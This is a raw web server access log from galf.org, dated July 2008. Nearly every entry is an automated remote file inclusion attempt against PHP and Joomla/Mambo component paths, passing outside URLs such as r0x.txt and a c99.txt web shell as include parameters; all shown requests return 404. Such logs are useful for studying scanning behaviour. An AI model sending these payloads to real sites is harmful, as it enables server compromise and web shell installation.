69.72.153.58 - - [20/Jul/2008:17:43:08 -0700] "GET /logs/errors.php?error=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/dul.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.galf.org"
87.244.11.20 - - [20/Jul/2008:17:43:09 -0700] "GET //components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.244.11.20 - - [20/Jul/2008:17:43:14 -0700] "GET /logs//components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
210.127.253.161 - - [20/Jul/2008:17:43:19 -0700] "GET /logs/access_071112.log//components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
218.38.12.93 - - [20/Jul/2008:17:43:36 -0700] "GET /logs//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.38.12.93 - - [20/Jul/2008:17:43:36 -0700] "GET //components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.97.43.58 - - [20/Jul/2008:17:43:42 -0700] "GET /logs/access_070820.log//content.php?page=http://autopilotprofitvideos.com/phpAutoVideo//admin/ID.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.galf.org"
216.97.43.58 - - [20/Jul/2008:17:43:46 -0700] "GET //content.php?page=http://autopilotprofitvideos.com/phpAutoVideo//admin/ID.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.galf.org"
216.97.43.58 - - [20/Jul/2008:17:43:46 -0700] "GET /logs//content.php?page=http://autopilotprofitvideos.com/phpAutoVideo//admin/ID.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.galf.org"
84.204.129.106 - - [20/Jul/2008:17:43:47 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://cabinet-chapuis.info/graphisme/images/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.galf.org"
210.127.253.161 - - [20/Jul/2008:17:43:58 -0700] "GET /logs/access_070827.log//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.67.26.157 - - [20/Jul/2008:17:45:02 -0700] "GET /logs/access_070924.log/modules/xfsection//modify.php?dir_module=http://neu_2.lasrv-1.de/web/%20/.../ident.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.246.78.141 - - [20/Jul/2008:17:45:39 -0700] "GET /logs/access_071105.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://classyclassified.com/images/save.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
216.246.78.141 - - [20/Jul/2008:17:45:39 -0700] "GET /logs/access_071008.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://classyclassified.com/images/save.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
189.73.196.247 - - [20/Jul/2008:17:46:09 -0700] "GET /logs/access_070723.log/index.php?pagina=http://h1.ripway.com/heidik/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
189.73.196.247 - - [20/Jul/2008:17:46:10 -0700] "GET /logs/index.php?pagina=http://h1.ripway.com/heidik/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
62.212.130.170 - - [20/Jul/2008:17:46:24 -0700] "GET /errors.php?error=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/dul.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.galf.org"
62.212.130.170 - - [20/Jul/2008:17:46:24 -0700] "GET /logs/errors.php?error=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/dul.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.galf.org"
66.225.192.14 - - [20/Jul/2008:17:46:26 -0700] "GET /logs/access_080407.log//init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/sourc3rs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
66.225.192.14 - - [20/Jul/2008:17:46:27 -0700] "GET //init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/sourc3rs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
66.225.192.14 - - [20/Jul/2008:17:46:28 -0700] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/sourc3rs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
210.127.253.161 - - [20/Jul/2008:17:46:32 -0700] "GET /logs/access_071112.log//administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
210.127.253.161 - - [20/Jul/2008:17:46:33 -0700] "GET //administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
210.127.253.161 - - [20/Jul/2008:17:46:33 -0700] "GET /logs//administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
218.38.12.93 - - [20/Jul/2008:17:46:33 -0700] "GET /logs/access_071112.log//administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.38.12.93 - - [20/Jul/2008:17:46:34 -0700] "GET //administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.38.12.93 - - [20/Jul/2008:17:46:34 -0700] "GET /logs//administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.38.12.93 - - [20/Jul/2008:17:46:45 -0700] "GET /logs/access_080331.log//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.38.12.93 - - [20/Jul/2008:17:46:45 -0700] "GET //administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.38.12.93 - - [20/Jul/2008:17:46:46 -0700] "GET /logs//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
195.5.163.212 - - [20/Jul/2008:17:46:55 -0700] "GET /event.php?myevent_path=http://purearcade.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.galf.org"
195.5.163.212 - - [20/Jul/2008:17:46:55 -0700] "GET /logs/event.php?myevent_path=http://purearcade.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.galf.org"
210.127.253.161 - - [20/Jul/2008:17:46:58 -0700] "GET /logs/access_080331.log//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
210.127.253.161 - - [20/Jul/2008:17:46:59 -0700] "GET //administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
210.127.253.161 - - [20/Jul/2008:17:46:59 -0700] "GET /logs//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
210.127.253.161 - - [20/Jul/2008:17:47:16 -0700] "GET /logs//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
218.38.12.93 - - [20/Jul/2008:17:47:17 -0700] "GET /logs/access_070820.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.38.12.93 - - [20/Jul/2008:17:47:17 -0700] "GET //administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.38.12.93 - - [20/Jul/2008:17:47:18 -0700] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
210.127.253.161 - - [20/Jul/2008:17:47:40 -0700] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
210.127.253.161 - - [20/Jul/2008:17:47:41 -0700] "GET /logs/access_080421.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
189.73.196.247 - - [20/Jul/2008:17:48:43 -0700] "GET /logs/access_070827.log/index.php?pagina=http://h1.ripway.com/heidik/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
218.38.12.93 - - [20/Jul/2008:17:48:51 -0700] "GET /logs/access_071112.log//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.104.34.70 - - [20/Jul/2008:17:48:56 -0700] "GET /errors.php?error=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/dul.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "galf.org"
216.104.34.70 - - [20/Jul/2008:17:48:56 -0700] "GET /logs/errors.php?error=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/dul.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "galf.org"
210.127.253.161 - - [20/Jul/2008:17:49:19 -0700] "GET /logs/access_071112.log//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
211.60.155.3 - - [20/Jul/2008:17:49:42 -0700] "GET //index.php?option=com_dtregister&eventId=http://www.hot-horny-housewives.com/amember/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.galf.org"
211.60.155.3 - - [20/Jul/2008:17:49:46 -0700] "GET /logs//index.php?option=com_dtregister&eventId=http://www.hot-horny-housewives.com/amember/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.galf.org"
218.38.12.93 - - [20/Jul/2008:17:49:57 -0700] "GET /logs/access_080526.log//administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
168.209.97.42 - - [20/Jul/2008:17:49:58 -0700] "GET /errors.php?error=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/nfo.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.galf.org"
168.209.97.42 - - [20/Jul/2008:17:49:59 -0700] "GET /logs/errors.php?error=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/nfo.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.galf.org"
64.8.105.21 - - [20/Jul/2008:17:50:09 -0700] "GET /logs/access_080609.log//skin/zero_vote/error.php?dir=http://www.posejdon.ru/v6-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
210.127.253.161 - - [20/Jul/2008:17:50:10 -0700] "GET /logs/access_080526.log//administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.8.105.21 - - [20/Jul/2008:17:50:21 -0700] "GET /logs/access_070924.log//skin/zero_vote/error.php?dir=http://www.posejdon.ru/v6-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
69.72.153.58 - - [20/Jul/2008:17:50:52 -0700] "GET /logs/errors.php?error=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/dul.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "galf.org"
69.72.153.58 - - [20/Jul/2008:17:50:52 -0700] "GET /errors.php?error=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/dul.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "galf.org"
216.104.34.70 - - [20/Jul/2008:17:51:04 -0700] "GET //index.php?option=index.php?option=com_content&task=blogcategory&id=60&Itemid=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/dul.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "galf.org"
216.104.34.70 - - [20/Jul/2008:17:51:04 -0700] "GET /logs//index.php?option=index.php?option=com_content&task=blogcategory&id=60&Itemid=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/dul.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "galf.org"
209.62.26.66 - - [20/Jul/2008:17:51:35 -0700] "GET /logs/index.php?go=http:/eskisiben.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.galf.org"
209.62.26.66 - - [20/Jul/2008:17:51:35 -0700] "GET /index.php?go=http:/eskisiben.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.galf.org"
209.62.26.66 - - [20/Jul/2008:17:51:35 -0700] "GET /logs/access_070826.log/index.php?go=http:/eskisiben.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.galf.org"
209.62.26.66 - - [20/Jul/2008:17:51:38 -0700] "GET /logs/access_070723.log/index.php?go=http:/eskisiben.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.galf.org"
69.72.153.58 - - [20/Jul/2008:17:51:49 -0700] "GET //index.php?option=index.php?option=com_content&task=blogcategory&id=60&Itemid=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/dul.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "galf.org"
69.72.153.58 - - [20/Jul/2008:17:51:49 -0700] "GET /logs//index.php?option=index.php?option=com_content&task=blogcategory&id=60&Itemid=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/dul.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "galf.org"
168.209.97.42 - - [20/Jul/2008:17:52:30 -0700] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/nfo.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "galf.org"
168.209.97.42 - - [20/Jul/2008:17:52:30 -0700] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/nfo.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "galf.org"
195.32.96.7 - - [20/Jul/2008:17:52:34 -0700] "GET /logs/access_071105.log/!scanhttp://www.brazebo.it/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
195.32.96.7 - - [20/Jul/2008:17:52:34 -0700] "GET /!scanhttp://www.brazebo.it/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
195.32.96.7 - - [20/Jul/2008:17:52:35 -0700] "GET /logs/!scanhttp://www.brazebo.it/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
85.114.135.126 - - [20/Jul/2008:17:52:46 -0700] "GET /logs/access_070820.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_pathftp://212.11.127.86/tmp/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.114.135.126 - - [20/Jul/2008:17:52:46 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_pathftp://212.11.127.86/tmp/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.114.135.126 - - [20/Jul/2008:17:52:46 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_pathftp://212.11.127.86/tmp/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.29.87.80 - - [20/Jul/2008:17:53:01 -0700] "GET /logs/access_080421.log//components/errors.php?error=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.29.87.80 - - [20/Jul/2008:17:53:01 -0700] "GET //components/errors.php?error=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.29.87.80 - - [20/Jul/2008:17:53:02 -0700] "GET /logs//components/errors.php?error=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.104.34.70 - - [20/Jul/2008:17:53:05 -0700] "GET /index.php?filter=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/dul.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.galf.org"
216.104.34.70 - - [20/Jul/2008:17:53:05 -0700] "GET /logs/index.php?filter=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/dul.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.galf.org"
74.6.18.253 - - [20/Jul/2008:17:53:25 -0700] "GET /logs/access_080414.log HTTP/1.0" 200 786432 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
85.114.135.126 - - [20/Jul/2008:17:53:28 -0700] "GET /logs/access_071001.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_pathftp://212.11.127.86/tmp/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.29.87.80 - - [20/Jul/2008:17:53:44 -0700] "GET /logs/access_071231.log//components/errors.php?error=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
218.38.12.93 - - [20/Jul/2008:17:54:11 -0700] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.38.12.93 - - [20/Jul/2008:17:54:11 -0700] "GET //administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
195.32.96.7 - - [20/Jul/2008:17:54:35 -0700] "GET /!scanhttp://www.brazebo.it/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
193.136.196.146 - - [20/Jul/2008:17:56:55 -0700] "GET /logs/access_080107.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://buqtery.cc/c99.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
193.136.196.146 - - [20/Jul/2008:17:56:55 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://buqtery.cc/c99.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
193.136.196.146 - - [20/Jul/2008:17:56:55 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://buqtery.cc/c99.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
190.16.80.65 - - [20/Jul/2008:17:57:18 -0700] "GET / HTTP/1.1" 200 1048 "http://www.rimaweb.com.ar/safopiensa/direccionario.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 2.0.50727)" "www.galf.org"
210.143.111.146 - - [20/Jul/2008:17:59:17 -0700] "GET /logs/access_080107.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://buqtery.cc/c99.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.galf.org"
210.143.111.146 - - [20/Jul/2008:17:59:17 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://buqtery.cc/c99.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.galf.org"
210.143.111.146 - - [20/Jul/2008:17:59:18 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://buqtery.cc/c99.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.galf.org"
168.209.97.42 - - [20/Jul/2008:17:59:41 -0700] "GET /common/db.php?commonpath=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/nfo.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.galf.org"
168.209.97.42 - - [20/Jul/2008:17:59:42 -0700] "GET /logs/common/db.php?commonpath=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/nfo.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.galf.org"
195.39.5.203 - - [20/Jul/2008:17:59:57 -0700] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://linknetcrew.com/source/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
195.39.5.203 - - [20/Jul/2008:17:59:58 -0700] "GET //include/admin.lib.inc.php?site_path=http://linknetcrew.com/source/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
195.39.5.203 - - [20/Jul/2008:17:59:59 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://linknetcrew.com/source/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.55.216.70 - - [20/Jul/2008:18:00:09 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
200.55.216.70 - - [20/Jul/2008:18:00:10 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
217.217.156.81 - - [20/Jul/2008:18:01:16 -0700] "GET //skin/zero_vote/error.php?dir=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.galf.org"
217.217.156.81 - - [20/Jul/2008:18:01:17 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.galf.org"
69.72.153.58 - - [20/Jul/2008:18:01:28 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/dul.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.galf.org"
69.72.153.58 - - [20/Jul/2008:18:01:28 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/dul.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.galf.org"
216.104.34.70 - - [20/Jul/2008:18:01:50 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/dul.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.galf.org"
216.104.34.70 - - [20/Jul/2008:18:01:50 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/dul.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.galf.org"
195.39.5.203 - - [20/Jul/2008:18:03:03 -0700] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://linknetcrew.com/source/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
195.39.5.203 - - [20/Jul/2008:18:03:04 -0700] "GET //include/admin.lib.inc.php?site_path=http://linknetcrew.com/source/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
195.39.5.203 - - [20/Jul/2008:18:03:04 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://linknetcrew.com/source/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
211.60.155.3 - - [20/Jul/2008:18:03:06 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.hot-horny-housewives.com/amember/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "galf.org"
211.60.155.3 - - [20/Jul/2008:18:03:07 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.hot-horny-housewives.com/amember/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "galf.org"
217.217.156.81 - - [20/Jul/2008:18:03:58 -0700] "GET /logs/access_080310.log//skin/zero_vote/error.php?dir=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.galf.org"
